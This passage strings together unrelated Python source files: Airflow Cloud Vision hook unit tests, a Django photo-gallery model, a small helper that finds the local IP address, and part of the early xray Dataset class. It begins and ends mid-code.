        # Product ID was provided explicitly in the method call above, should be returned from the method
        annotate_image_method.assert_called_once_with(
            request=ANNOTATE_IMAGE_REQUEST, retry=None, timeout=None
        )

    @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client')
    def test_batch_annotate_images(self, annotator_client_mock):
        # Given
        batch_annotate_images_method = annotator_client_mock.batch_annotate_images

        # When
        self.hook.batch_annotate_images(requests=BATCH_ANNOTATE_IMAGE_REQUEST)
        # Then
        # Product ID was provided explicitly in the method call above, should be returned from the method
        batch_annotate_images_method.assert_called_once_with(
            requests=BATCH_ANNOTATE_IMAGE_REQUEST, retry=None, timeout=None
        )

    @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
    def test_create_product_explicit_id(self, get_conn):
        # Given
        create_product_method = get_conn.return_value.create_product
        create_product_method.return_value = None
        parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST)
        product = Product()
        # When
        result = self.hook.create_product(
            location=LOC_ID_TEST, product_id=PRODUCT_ID_TEST, product=product, project_id=PROJECT_ID_TEST
        )
        # Then
        # Product ID was provided explicitly in the method call above, should be returned from the method
        assert result == PRODUCT_ID_TEST
        create_product_method.assert_called_once_with(
            parent=parent,
            product=product,
            product_id=PRODUCT_ID_TEST,
            retry=None,
            timeout=None,
            metadata=None,
        )

    @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
    def test_create_product_autogenerated_id(self, get_conn):
        # Given
        autogenerated_id = 'autogen-p-id'
        response_product = Product(
            name=ProductSearchClient.product_path(PROJECT_ID_TEST, LOC_ID_TEST, autogenerated_id)
        )
        create_product_method = get_conn.return_value.create_product
        create_product_method.return_value = response_product
        parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST)
        product = Product()
        # When
        result = self.hook.create_product(
            location=LOC_ID_TEST, product_id=None, product=product, project_id=PROJECT_ID_TEST
        )
        # Then
        # Product ID was not provided in the method call above. Should be extracted from the API response
        # and returned.
        assert result == autogenerated_id
        create_product_method.assert_called_once_with(
            parent=parent, product=product, product_id=None, retry=None, timeout=None, metadata=None
        )

    @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
    def test_create_product_autogenerated_id_wrong_name_in_response(self, get_conn):
        # Given
        wrong_name = 'wrong_name_not_a_correct_path'
        response_product = Product(name=wrong_name)
        create_product_method = get_conn.return_value.create_product
        create_product_method.return_value = response_product
        parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST)
        product = Product()
        # When
        with pytest.raises(AirflowException) as ctx:
            self.hook.create_product(
                location=LOC_ID_TEST, product_id=None, product=product, project_id=PROJECT_ID_TEST
            )
        # Then
        # API response was wrong (wrong name format) and thus ProductSet ID extraction should fail.
        err = ctx.value
        assert 'Unable to get id from name' in str(err)
        create_product_method.assert_called_once_with(
            parent=parent, product=product, product_id=None, retry=None, timeout=None, metadata=None
        )

    @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
    def test_create_product_autogenerated_id_wrong_api_response(self, get_conn):
        # Given
        response_product = None
        create_product_method = get_conn.return_value.create_product
        create_product_method.return_value = response_product
        parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST)
        product = Product()
        # When
        with pytest.raises(AirflowException) as ctx:
            self.hook.create_product(
                location=LOC_ID_TEST, product_id=None, product=product, project_id=PROJECT_ID_TEST
            )
        # Then
        # API response was wrong (None) and thus ProductSet ID extraction should fail.
        err = ctx.value
        assert 'Unable to get name from response...' in str(err)
        create_product_method.assert_called_once_with(
            parent=parent, product=product, product_id=None, retry=None, timeout=None, metadata=None
        )

    @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
    def test_update_product_no_explicit_name(self, get_conn):
        # Given
        product = Product()
        update_product_method = get_conn.return_value.update_product
        update_product_method.return_value = product
        product_name = ProductSearchClient.product_path(PROJECT_ID_TEST, LOC_ID_TEST, PRODUCT_ID_TEST)
        # When
        result = self.hook.update_product(
            location=LOC_ID_TEST,
            product_id=PRODUCT_ID_TEST,
            product=product,
            update_mask=None,
            project_id=PROJECT_ID_TEST,
            retry=None,
            timeout=None,
            metadata=None,
        )
        # Then
        assert result == MessageToDict(product)
        update_product_method.assert_called_once_with(
            product=Product(name=product_name), metadata=None, retry=None, timeout=None, update_mask=None
        )

    @parameterized.expand([(None, None), (None, PRODUCT_ID_TEST), (LOC_ID_TEST, None)])
    @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
    def test_update_product_no_explicit_name_and_missing_params_for_constructed_name(
        self, location, product_id, get_conn
    ):
        # Given
        update_product_method = get_conn.return_value.update_product
        update_product_method.return_value = None
        product = Product()
        # When
        with pytest.raises(AirflowException) as ctx:
            self.hook.update_product(
                location=location,
                product_id=product_id,
                product=product,
                update_mask=None,
                project_id=PROJECT_ID_TEST,
                retry=None,
                timeout=None,
                metadata=None,
            )
        err = ctx.value
        assert err
        assert ERR_UNABLE_TO_CREATE.format(label='Product', id_label='product_id') in str(err)
        update_product_method.assert_not_called()

    @parameterized.expand([(None, None), (None, PRODUCT_ID_TEST), (LOC_ID_TEST, None)])
    @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
    def test_update_product_explicit_name_missing_params_for_constructed_name(
        self, location, product_id, get_conn
    ):
        # Given
        explicit_p_name = ProductSearchClient.product_path(
            PROJECT_ID_TEST_2, LOC_ID_TEST_2, PRODUCT_ID_TEST_2
        )
        product = Product(name=explicit_p_name)
        update_product_method = get_conn.return_value.update_product
        update_product_method.return_value = product
        # When
        result = self.hook.update_product(
            location=location,
            product_id=product_id,
            product=product,
            update_mask=None,
            project_id=PROJECT_ID_TEST,
            retry=None,
            timeout=None,
            metadata=None,
        )
        # Then
        assert result == MessageToDict(product)
        update_product_method.assert_called_once_with(
            product=Product(name=explicit_p_name), metadata=None, retry=None, timeout=None, update_mask=None
        )

    @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
    def test_update_product_explicit_name_different_from_constructed(self, get_conn):
        # Given
        update_product_method = get_conn.return_value.update_product
        update_product_method.return_value = None
        explicit_p_name = ProductSearchClient.product_path(
            PROJECT_ID_TEST_2, LOC_ID_TEST_2, PRODUCT_ID_TEST_2
        )
        product = Product(name=explicit_p_name)
        template_p_name = ProductSearchClient.product_path(PROJECT_ID_TEST, LOC_ID_TEST, PRODUCT_ID_TEST)
        # When
        # Location and product_id are passed in addition to a Product with an explicit name,
        # but both names differ (constructed != explicit).
        # Should throw AirflowException in this case.
        with pytest.raises(AirflowException) as ctx:
            self.hook.update_product(
                location=LOC_ID_TEST,
                product_id=PRODUCT_ID_TEST,
                product=product,
                update_mask=None,
                project_id=PROJECT_ID_TEST,
                retry=None,
                timeout=None,
                metadata=None,
            )
        err = ctx.value
        assert err
        assert (
            ERR_DIFF_NAMES.format(
                explicit_name=explicit_p_name,
                constructed_name=template_p_name,
                label="Product",
                id_label="product_id",
            )
            in str(err)
        )
        update_product_method.assert_not_called()

    @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
    def test_delete_product(self, get_conn):
        # Given
        delete_product_method = get_conn.return_value.delete_product
        delete_product_method.return_value = None
        name = ProductSearchClient.product_path(PROJECT_ID_TEST, LOC_ID_TEST, PRODUCT_ID_TEST)
        # When
        response = self.hook.delete_product(
            location=LOC_ID_TEST, product_id=PRODUCT_ID_TEST, project_id=PROJECT_ID_TEST
        )
        # Then
        assert response is None
        delete_product_method.assert_called_once_with(name=name, retry=None, timeout=None, metadata=None)

    @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
    def test_detect_text(self, annotator_client_mock):
        # Given
        detect_text_method = annotator_client_mock.text_detection
        detect_text_method.return_value = AnnotateImageResponse(
            text_annotations=[EntityAnnotation(description="test", score=0.5)]
        )

        # When
        self.hook.text_detection(image=DETECT_TEST_IMAGE)

        # Then
        detect_text_method.assert_called_once_with(
            image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None
        )

    @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
    def test_detect_text_with_additional_properties(self, annotator_client_mock):
        # Given
        detect_text_method = annotator_client_mock.text_detection
        detect_text_method.return_value = AnnotateImageResponse(
            text_annotations=[EntityAnnotation(description="test", score=0.5)]
        )

        # When
        self.hook.text_detection(
            image=DETECT_TEST_IMAGE, additional_properties={"prop1": "test1", "prop2": "test2"}
        )

        # Then
        detect_text_method.assert_called_once_with(
            image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None, prop1="test1", prop2="test2"
        )

    @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
    def test_detect_text_with_error_response(self, annotator_client_mock):
        # Given
        detect_text_method = annotator_client_mock.text_detection
        detect_text_method.return_value = AnnotateImageResponse(
            error={"code": 3, "message": "test error message"}
        )

        # When
        with pytest.raises(AirflowException) as ctx:
            self.hook.text_detection(image=DETECT_TEST_IMAGE)

        err = ctx.value
        assert "test error message" in str(err)

    @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
    def test_document_text_detection(self, annotator_client_mock):
        # Given
        document_text_detection_method = annotator_client_mock.document_text_detection
        document_text_detection_method.return_value = AnnotateImageResponse(
            text_annotations=[EntityAnnotation(description="test", score=0.5)]
        )

        # When
        self.hook.document_text_detection(image=DETECT_TEST_IMAGE)

        # Then
        document_text_detection_method.assert_called_once_with(
            image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None
        )

    @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
    def test_document_text_detection_with_additional_properties(self, annotator_client_mock):
        # Given
        document_text_detection_method = annotator_client_mock.document_text_detection
        document_text_detection_method.return_value = AnnotateImageResponse(
            text_annotations=[EntityAnnotation(description="test", score=0.5)]
        )

        # When
        self.hook.document_text_detection(
            image=DETECT_TEST_IMAGE, additional_properties={"prop1": "test1", "prop2": "test2"}
        )

        # Then
        document_text_detection_method.assert_called_once_with(
            image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None, prop1="test1", prop2="test2"
        )

    @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
    def test_detect_document_text_with_error_response(self, annotator_client_mock):
        # Given
        detect_text_method = annotator_client_mock.document_text_detection
        detect_text_method.return_value = AnnotateImageResponse(
            error={"code": 3, "message": "test error message"}
        )

        # When
        with pytest.raises(AirflowException) as ctx:
            self.hook.document_text_detection(image=DETECT_TEST_IMAGE)

        err = ctx.value
        assert "test error message" in str(err)

    @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
    def test_label_detection(self, annotator_client_mock):
        # Given
        label_detection_method = annotator_client_mock.label_detection
        label_detection_method.return_value = AnnotateImageResponse(
            label_annotations=[EntityAnnotation(description="test", score=0.5)]
        )

        # When
        self.hook.label_detection(image=DETECT_TEST_IMAGE)

        # Then
        label_detection_method.assert_called_once_with(
            image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None
        )

    @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
    def test_label_detection_with_additional_properties(self, annotator_client_mock):
        # Given
        label_detection_method = annotator_client_mock.label_detection
        label_detection_method.return_value = AnnotateImageResponse(
            label_annotations=[EntityAnnotation(description="test", score=0.5)]
        )

        # When
        self.hook.label_detection(
            image=DETECT_TEST_IMAGE, additional_properties={"prop1": "test1", "prop2": "test2"}
        )

        # Then
        label_detection_method.assert_called_once_with(
            image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None, prop1="test1", prop2="test2"
        )

    @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
    def test_label_detection_with_error_response(self, annotator_client_mock):
        # Given
        detect_text_method = annotator_client_mock.label_detection
        detect_text_method.return_value = AnnotateImageResponse(
            error={"code": 3, "message": "test error message"}
        )

        # When
        with pytest.raises(AirflowException) as ctx:
            self.hook.label_detection(image=DETECT_TEST_IMAGE)

        err = ctx.value
        assert "test error message" in str(err)

    @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
    def test_safe_search_detection(self, annotator_client_mock):
        # Given
        safe_search_detection_method = annotator_client_mock.safe_search_detection
        safe_search_detection_method.return_value = AnnotateImageResponse(
            safe_search_annotation=SafeSearchAnnotation(
                adult="VERY_UNLIKELY",
                spoof="VERY_UNLIKELY",
                medical="VERY_UNLIKELY",
                violence="VERY_UNLIKELY",
                racy="VERY_UNLIKELY",
            )
        )

        # When
        self.hook.safe_search_detection(image=DETECT_TEST_IMAGE)

        # Then
        safe_search_detection_method.assert_called_once_with(
            image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None
        )

    @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
    def test_safe_search_detection_with_additional_properties(self, annotator_client_mock):
        # Given
        safe_search_detection_method = annotator_client_mock.safe_search_detection
        safe_search_detection_method.return_value = AnnotateImageResponse(
            safe_search_annotation=SafeSearchAnnotation(
                adult="VERY_UNLIKELY",
                spoof="VERY_UNLIKELY",
                medical="VERY_UNLIKELY",
                violence="VERY_UNLIKELY",
                racy="VERY_UNLIKELY",
            )
        )

        # When
        self.hook.safe_search_detection(
            image=DETECT_TEST_IMAGE, additional_properties={"prop1": "test1", "prop2": "test2"}
        )

        # Then
        safe_search_detection_method.assert_called_once_with(
            image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None, prop1="test1", prop2="test2"
        )

    @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
    def test_safe_search_detection_with_error_response(self, annotator_client_mock):
        # Given
        detect_text_method = annotator_client_mock.safe_search_detection
        detect_text_method.return_value = AnnotateImageResponse(
            error={"code": 3, "message": "test error message"}
        )

        # When
        with pytest.raises(AirflowException) as ctx:
            self.hook.safe_search_detection(image=DETECT_TEST_IMAGE)

        err = ctx.value
        assert "test error message" in str(err)

from django.db import models
from django.utils.html import format_html
from sorl.thumbnail import get_thumbnail
from sorl.thumbnail.fields import ImageField
from sno.models import Sno


class SnoGalleries(models.Model):
    class Meta:
        verbose_name = 'Фотография в галереи СНО'
        verbose_name_plural = 'Фотографии в галереи СНО'

    name = models.CharField('Название фото', max_length=255, blank=True, null=True)
    photo = ImageField(verbose_name='Фото', max_length=255)
    description = models.TextField('Описание', blank=True, null=True)
    sno = models.ForeignKey(Sno, verbose_name='СНО', on_delete=models.CASCADE)
    date_created = models.DateField('Дата', auto_now_add=True)

    def photo_preview(self):
        img = get_thumbnail(self.photo, '75x75', crop='center')
        return format_html('<a href="{}" target="_blank"><img style="width:75px; height:75px;" src="{}"></a>',
                           self.photo.url, img.url)

    photo_preview.short_description = 'Фото'

    def __str__(self):
        return '%s (%s)' % (self.name, self.sno.short_name)

# Copyright 2018 Flight Lab authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#    https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Library for network related helpers."""

import socket


def get_ip():
  """Get primary IP (the one with a default route) of local machine.

  This works on both Linux and Windows platforms, and doesn't require working
  internet connection.
  """

  s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  try:
    # doesn't even have to be reachable
    s.connect(('10.255.255.255', 1))
    return s.getsockname()[0]
  except:
    return '127.0.0.1'
  finally:
    s.close()

import functools
import warnings
from collections import Mapping, Sequence
from numbers import Number

import numpy as np
import pandas as pd

from . import ops
from . import utils
from . import common
from . import groupby
from . import indexing
from . import alignment
from . import formatting
from .. import conventions
from .alignment import align, partial_align
from .coordinates import DatasetCoordinates, Indexes
from .common import ImplementsDatasetReduce, BaseDataObject
from .utils import (Frozen, SortedKeysDict, ChainMap, maybe_wrap_array)
from .variable import as_variable, Variable, Coordinate, broadcast_variables
from .pycompat import (iteritems, itervalues, basestring, OrderedDict,
                       dask_array_type)
from .combine import concat


# list of attributes of pd.DatetimeIndex that are ndarrays of time info
_DATETIMEINDEX_COMPONENTS = ['year', 'month', 'day', 'hour', 'minute',
                             'second', 'microsecond', 'nanosecond', 'date',
                             'time', 'dayofyear', 'weekofyear', 'dayofweek',
                             'quarter']


def _get_virtual_variable(variables, key):
    """Get a virtual variable (e.g., 'time.year') from a dict of xray.Variable
    objects (if possible)
    """
    if not isinstance(key, basestring):
        raise KeyError(key)

    split_key = key.split('.', 1)
    if len(split_key) != 2:
        raise KeyError(key)

    ref_name, var_name = split_key
    ref_var = variables[ref_name]
    if ref_var.ndim == 1:
        date = ref_var.to_index()
    elif ref_var.ndim == 0:
        date = pd.Timestamp(ref_var.values)
    else:
        raise KeyError(key)

    if var_name == 'season':
        # TODO: move 'season' into pandas itself
        seasons = np.array(['DJF', 'MAM', 'JJA', 'SON'])
        month = date.month
        data = seasons[(month // 3) % 4]
    else:
        data = getattr(date, var_name)
    return ref_name, var_name, Variable(ref_var.dims, data)


def _as_dataset_variable(name, var):
    """Prepare a variable for adding it to a Dataset
    """
    try:
        var = as_variable(var, key=name)
    except TypeError:
        raise TypeError('Dataset variables must be an array or a tuple of '
                        'the form (dims, data[, attrs, encoding])')
    if name in var.dims:
        # convert the into an Index
        if var.ndim != 1:
            raise ValueError('an index variable must be defined with '
                             '1-dimensional data')
        var = var.to_coord()
    return var


def _align_variables(variables, join='outer'):
    """Align all DataArrays in the provided dict, leaving other values alone.
    """
    alignable = [k for k, v in variables.items() if hasattr(v, 'indexes')]
    aligned = align(*[variables[a] for a in alignable],
                    join=join, copy=False)
    new_variables = OrderedDict(variables)
    new_variables.update(zip(alignable, aligned))
    return new_variables


def _expand_variables(raw_variables, old_variables={}, compat='identical'):
    """Expand a dictionary of variables.

    Returns a dictionary of Variable objects suitable for inserting into a
    Dataset._variables dictionary.

    This includes converting tuples (dims, data) into Variable objects,
    converting coordinate variables into Coordinate objects and expanding
    DataArray objects into Variables plus coordinates.

    Raises ValueError if any conflicting values are found, between any of the
    new or old variables.
    """
    new_variables = OrderedDict()
    new_coord_names = set()
    variables = ChainMap(new_variables, old_variables)

    def maybe_promote_or_replace(name, var):
        existing_var = variables[name]
        if name not in existing_var.dims:
            if name in var.dims:
                variables[name] = var
            else:
                common_dims = OrderedDict(zip(existing_var.dims,
                                              existing_var.shape))
                common_dims.update(zip(var.dims, var.shape))
                variables[name] = existing_var.expand_dims(common_dims)
                new_coord_names.update(var.dims)

    def add_variable(name, var):
        var = _as_dataset_variable(name, var)
        if name not in variables:
            variables[name] = var
            new_coord_names.update(variables[name].dims)
        else:
            if not getattr(variables[name], compat)(var):
                raise ValueError('conflicting value for variable %s:\n'
                                 'first value: %r\nsecond value: %r'
                                 % (name, variables[name], var))
            if compat == 'broadcast_equals':
                maybe_promote_or_replace(name, var)

    for name, var in iteritems(raw_variables):
        if hasattr(var, 'coords'):
            # it's a DataArray
            new_coord_names.update(var.coords)
            for dim, coord in iteritems(var.coords):
                if dim != name:
                    add_variable(dim, coord.variable)
            var = var.variable
        add_variable(name, var)

    return new_variables, new_coord_names


def _calculate_dims(variables):
    """Calculate the dimensions corresponding to a set of variables.

    Returns dictionary mapping from dimension names to sizes. Raises ValueError
    if any of the dimension sizes conflict.
    """
    dims = {}
    last_used = {}
    scalar_vars = set(k for k, v in iteritems(variables) if not v.dims)
    for k, var in iteritems(variables):
        for dim, size in zip(var.dims, var.shape):
            if dim in scalar_vars:
                raise ValueError('dimension %s already exists as a scalar '
                                 'variable' % dim)
            if dim not in dims:
                dims[dim] = size
                last_used[dim] = k
            elif dims[dim] != size:
                raise ValueError('conflicting sizes for dimension %r: '
                                 'length %s on %r and length %s on %r' %
                                 (dim, size, k, dims[dim], last_used[dim]))
    return dims


def _merge_expand(aligned_self, other, overwrite_vars, compat):
    possible_conflicts = dict((k, v) for k, v in aligned_self._variables.items()
                              if k not in overwrite_vars)
    new_vars, new_coord_names = _expand_variables(other, possible_conflicts, compat)
    replace_vars = aligned_self._variables.copy()
    replace_vars.update(new_vars)
    return replace_vars, new_vars, new_coord_names


def _merge_dataset(self, other, overwrite_vars, compat, join):
    aligned_self, other = partial_align(self, other, join=join, copy=False)

    replace_vars, new_vars, new_coord_names = _merge_expand(
        aligned_self, other._variables, overwrite_vars, compat)
    new_coord_names.update(other._coord_names)

    return replace_vars, new_vars, new_coord_names


def _merge_dict(self, other, overwrite_vars, compat, join):
    other = _align_variables(other, join='outer')

    alignable = [k for k, v in other.items() if hasattr(v, 'indexes')]
    aligned = partial_align(self, *[other[a] for a in alignable],
                            join=join, copy=False, exclude=overwrite_vars)

    aligned_self = aligned[0]

    other = OrderedDict(other)
    other.update(zip(alignable, aligned[1:]))

    return _merge_expand(aligned_self, other, overwrite_vars, compat)


def _assert_empty(args, msg='%s'):
    if args:
        raise ValueError(msg % args)


def as_dataset(obj):
    """Cast the given object to a Dataset.

    Handles DataArrays, Datasets and dictionaries of variables. A new Dataset
    object is only created in the last case.
    """
    obj = getattr(obj, '_dataset', obj)
    if not isinstance(obj, Dataset):
        obj = Dataset(obj)
    return obj


class Variables(Mapping):
    def __init__(self, dataset):
        self._dataset = dataset

    def __iter__(self):
        return (key for key in self._dataset._variables
                if key not in self._dataset._coord_names)

    def __len__(self):
        return len(self._dataset._variables) - len(self._dataset._coord_names)

    def __contains__(self, key):
        return (key in self._dataset._variables
                and key not in self._dataset._coord_names)

    def __getitem__(self, key):
        if key not in self._dataset._coord_names:
            return self._dataset[key]
        else:
            raise KeyError(key)

    def __repr__(self):
        return formatting.vars_repr(self)


class _LocIndexer(object):
    def __init__(self, dataset):
        self.dataset = dataset

    def __getitem__(self, key):
        if not utils.is_dict_like(key):
            raise TypeError('can only lookup dictionaries from Dataset.loc')
        return self.dataset.sel(**key)


class Dataset(Mapping, ImplementsDatasetReduce, BaseDataObject):
    """A multi-dimensional, in memory, array database.

    A dataset resembles an in-memory representation of a NetCDF file, and
    consists of variables, coordinates and attributes which together form a
    self describing dataset.

    Dataset implements the mapping interface with keys given by variable names
    and values given by DataArray objects for each variable name.

    One dimensional variables with name equal to their dimension are index
    coordinates used for label based indexing.
    """
    # class properties defined for the benefit of __setstate__, which otherwise
    # runs into trouble because we overrode __getattr__
    _attrs = None
    _variables = Frozen({})

    groupby_cls = groupby.DatasetGroupBy

    def __init__(self, variables=None, coords=None, attrs=None,
                 compat='broadcast_equals'):
        """To load data from a file or file-like object, use the `open_dataset`
        function.

        Parameters
        ----------
        variables : dict-like, optional
            A mapping from variable names to :py:class:`~xray.DataArray`
            objects, :py:class:`~xray.Variable` objects or tuples of the
            form ``(dims, data[, attrs])`` which can be used as arguments to
            create a new ``Variable``. Each dimension must have the same length
            in all variables in which it appears.
        coords : dict-like, optional
            Another mapping in the same form as the `variables` argument,
            except the each item is saved on the dataset as a "coordinate".
            These variables have an associated meaning: they describe
            constant/fixed/independent quantities, unlike the
            varying/measured/dependent quantities that belong in `variables`.
            Coordinates values may be given by 1-dimensional arrays or scalars,
            in which case `dims` do not need to be supplied: 1D arrays will be
            assumed to give index values along the dimension with the same
            name.
        attrs : dict-like, optional
            Global attributes to save on this dataset.
        compat : {'broadcast_equals', 'equals', 'identical'}, optional
            String indicating how to compare variables of the same name for
            potential conflicts:

            - 'broadcast_equals': all values must be equal when variables are
              broadcast against each other to ensure common dimensions.
            - 'equals': all values and dimensions must be the same.
            - 'identical': all values, dimensions and attributes must be the
              same.
        """
        self._variables = OrderedDict()
        self._coord_names = set()
        self._dims = {}
        self._attrs = None
        self._file_obj = None
        if variables is None:
            variables = {}
        if coords is None:
            coords = set()
        if variables or coords:
            self._set_init_vars_and_dims(variables, coords, compat)
        if attrs is not None:
            self.attrs = attrs

    def _add_missing_coords_inplace(self):
        """Add missing coordinates to self._variables
        """
        for dim, size in iteritems(self.dims):
            if dim not in self._variables:
                # This is equivalent to np.arange(size), but
                # waits to create the array until its actually accessed.
                data = indexing.LazyIntegerRange(size)
                coord = Coordinate(dim, data)
                self._variables[dim] = coord

    def _update_vars_and_coords(self, new_variables, new_coord_names={},
                                needs_copy=True, check_coord_names=True):
        """Add a dictionary of new variables to this dataset.

        Raises a ValueError if any dimensions have conflicting lengths in the
        new dataset. Otherwise will update this dataset's _variables and
        _dims attributes in-place.

        Set `needs_copy=False` only if this dataset is brand-new and hence
        can be thrown away if this method fails.
        """
        # default to creating another copy of variables so can unroll if we end
        # up with inconsistent dimensions
        variables = self._variables.copy() if needs_copy else self._variables

        if check_coord_names:
            _assert_empty([k for k in self.data_vars if k in new_coord_names],
                          'coordinates with these names already exist as '
                          'variables: %s')

        variables.update(new_variables)
        dims = _calculate_dims(variables)
        # all checks are complete: it's safe to update
        self._variables = variables
        self._dims = dims
        self._add_missing_coords_inplace()
        self._coord_names.update(new_coord_names)

    def _set_init_vars_and_dims(self, vars, coords, compat):
        """Set the initial value of Dataset variables and dimensions
        """
        _assert_empty([k for k in vars if k in coords],
                      'redundant variables and coordinates: %s')
        variables = ChainMap(vars, coords)

        aligned = _align_variables(variables)
        new_variables, new_coord_names = _expand_variables(aligned,
                                                           compat=compat)

        new_coord_names.update(coords)
        self._update_vars_and_coords(new_variables, new_coord_names,
                                     needs_copy=False, check_coord_names=False)

    @classmethod
    def load_store(cls, store, decoder=None):
        """Create a new dataset from the contents of a backends.*DataStore
        object
        """
        variables, attributes = store.load()
        if decoder:
            variables, attributes = decoder(variables, attributes)
        obj = cls(variables, attrs=attributes)
        obj._file_obj = store
        return obj

    def close(self):
        """Close any files linked to this dataset
        """
        if self._file_obj is not None:
            self._file_obj.close()
        self._file_obj = None

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        self.close()

    def __getstate__(self):
        """Always load data in-memory before pickling"""
        self.load()
        # self.__dict__ is the default pickle object, we don't need to
        # implement our own __setstate__ method to make pickle work
        state = self.__dict__.copy()
        # throw away any references to datastores in the pickle
        state['_file_obj'] = None
        return state

    @property
    def variables(self):
        """Frozen dictionary of xray.Variable objects constituting this
        dataset's data
        """
        return Frozen(self._variables)

    def _attrs_copy(self):
        return None if self._attrs is None else OrderedDict(self._attrs)

    @property
    def attrs(self):
        """Dictionary of global attributes on this dataset
        """
        if self._attrs is None:
            self._attrs = OrderedDict()
        return self._attrs

    @attrs.setter
    def attrs(self, value):
        self._attrs = OrderedDict(value)

    @property
    def dims(self):
        """Mapping from dimension names to lengths.

        This dictionary cannot be modified directly, but is updated when adding
        new variables.
        """
        return Frozen(SortedKeysDict(self._dims))

    def load(self):
        """Manually trigger loading of this dataset's data from disk or a
        remote source into memory and return this dataset.

        Normally, it should not be necessary to call this method in user code,
        because all xray functions should either work on deferred data or
        load data automatically. However, this method can be necessary when
        working with many file objects on disk.
        """
        # access .data to coerce everything to numpy or dask arrays
        all_data = dict((k, v.data) for k, v in self.variables.items())
        lazy_data = dict((k, v) for k, v in all_data.items()
                         if isinstance(v, dask_array_type))
        if lazy_data:
            import dask.array as da

            # evaluate all the dask arrays simultaneously
            evaluated_data = da.compute(*lazy_data.values())

            evaluated_variables = {}
            for k, data in zip(lazy_data, evaluated_data):
                self.variables[k].data = data

        return self

    def load_data(self):  # pragma: no cover
        warnings.warn('the Dataset method `load_data` has been deprecated; '
                      'use `load` instead',
                      FutureWarning, stacklevel=2)
        return self.load()

    @classmethod
    def _construct_direct(cls, variables, coord_names, dims, attrs,
                          file_obj=None):
        """Shortcut around __init__ for internal use when we want to skip
        costly validation
        """
        obj = object.__new__(cls)
        obj._variables = variables
        obj._coord_names = coord_names
        obj._dims = dims
        obj._attrs = attrs
        obj._file_obj = file_obj
        return obj

    __default_attrs = object()

    def _replace_vars_and_dims(self, variables, coord_names=None,
                               attrs=__default_attrs, inplace=False):
        """Fastpath constructor for internal use.

        Preserves coord names and attributes; dimensions are recalculated from
        the supplied variables.

        The arguments are *not* copied when placed on the new dataset. It is up
        to the caller to ensure that they have the right type and are not used
        elsewhere.

        Parameters
        ----------
        variables : OrderedDict
        coord_names : set or None, optional
        attrs : OrderedDict or None, optional

        Returns
        -------
        new : Dataset
        """
        dims = _calculate_dims(variables)
        if inplace:
            self._dims = dims
            self._variables = variables
            if coord_names is not None:
                self._coord_names = coord_names
            if attrs is not self.__default_attrs:
                self._attrs = attrs
            obj = self
        else:
            if coord_names is None:
                coord_names = self._coord_names.copy()
            if attrs is self.__default_attrs:
                attrs = self._attrs_copy()
            obj = self._construct_direct(variables, coord_names, dims, attrs)
        return obj

    def copy(self, deep=False):
        """Returns a copy of this dataset.

        If `deep=True`, a deep copy is made of each of the component variables.
        Otherwise, a shallow copy is made, so each variable in the new dataset
        is also a variable in the original dataset.
        """
        if deep:
            variables = OrderedDict((k, v.copy(deep=True))
                                    for k, v in iteritems(self._variables))
        else:
            variables = self._variables.copy()
        # skip __init__ to avoid costly validation
        return self._construct_direct(variables, self._coord_names.copy(),
                                      self._dims.copy(), self._attrs_copy())

    def _copy_listed(self, names, keep_attrs=True):
        """Create a new Dataset with the listed variables from this dataset and
        the all relevant coordinates. Skips all validation.
        """
        variables = OrderedDict()
        coord_names = set()

        for name in names:
            try:
                variables[name] = self._variables[name]
            except KeyError:
                ref_name, var_name, var = _get_virtual_variable(
                    self._variables, name)
                variables[var_name] = var
                if ref_name in self._coord_names:
                    coord_names.add(var_name)

        needed_dims = set()
        for v in variables.values():
            needed_dims.update(v._dims)
